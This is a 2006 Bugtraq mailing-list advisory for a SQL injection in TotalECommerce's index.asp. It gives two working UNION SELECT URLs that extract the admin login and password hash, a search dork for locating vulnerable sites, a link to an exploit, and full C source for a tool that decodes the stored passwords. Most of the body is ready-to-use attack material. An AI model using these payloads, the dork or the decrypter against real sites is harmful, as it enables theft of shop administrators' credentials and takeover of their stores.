Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.

To: submit@xxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
Subject: Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.
From: nukedx@xxxxxxxxxx
Date: Sat, 04 Mar 2006 16:26:07 +0200
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Internet Messaging Program (IMP) H3 (4.0.3)

--Security Report--
Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 04/03/06 04:36 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@xxxxxxxxxx
Web: http://www.nukedx.com
}
---
Vendor: TotalECommerce (http://www.totalecommerce.com)
Version: 1.0 and prior version must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to id
parameter
in index.asp
Level: Critical
---
How&Example:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,
login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,
login,login,login,login,login,login,login+from+administradores
with example 1 remote attacker can get admin's encrypted password and with
example 2 remote attacker can get admin's login name
[PageID]: must be working page id you can get some from frontpage.
---
Timeline:
* 04/03/2006: Vulnerability found.
* 04/03/2006: Could not contact with vendor.
* 04/03/2006: File closed.
---
Exploit&Decrypter:
http://www.nukedx.com/?getxpl=18
---
Dorks: intext:"totalecommerce"
---
Original advisory: http://www.nukedx.com/?getxpl=18

---
Decrypter source in C
---
/*********************************************
*        TotalECommerce PWD Decrypter        *
*        Coded by |SaMaN| for nukedx         *
*          http://www.k9world.org            *
*              IRC.K9World.Org               *
*Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main()
{
  char buf[255];
  char buf2[255];
  char buf3[255];
  char *texto;
  char *vcrypt;
  int i,x,z,t = 0;
  char saman;
  texto = buf;
  vcrypt = buf2;
  printf("%s", "|=------------------------------------=|\n");
  printf("%s", "   Coded by |SaMaN| @ IRC.K9World.Org\n");
  printf("%s", "|=------------------------------------=|\n\n");
  printf("%s", "Enter crypted password: ");
  scanf("%200s", buf);
  if (!texto)
  vcrypt = "";

  for (i = 0; i < strlen(texto); i++)
  {
    if ((vcrypt == "") || (i > strlen(texto)))
    x = 1;
    else
    x = x + 1;
    t = buf[i];
    z = 255 - t;
    saman = toascii(z);
    snprintf(buf3, 250, "%c", saman);
    strncat(buf2, buf3, 250);
  }
  printf("Result: %s\n", buf2);
  return;
}
---End of code---
Greets to: |SaMaN|

Follow-Ups:
- Advisory: BetaParticle Blog <= 6.0 Multiple Remote SQL Injection Vulnerabilities
  - From: nukedx

Prev by Date: [KAPDA::#30] - CuteNews1.4.1 Cross_Site_Scripting Vulnerability
Next by Date: PHP-Stats <= 0.1.9.1 remote commands execution
Previous by thread: [KAPDA::#30] - CuteNews1.4.1 Cross_Site_Scripting Vulnerability
Next by thread: Advisory: BetaParticle Blog <= 6.0 Multiple Remote SQL Injection Vulnerabilities
Index(es):
- Date
- Thread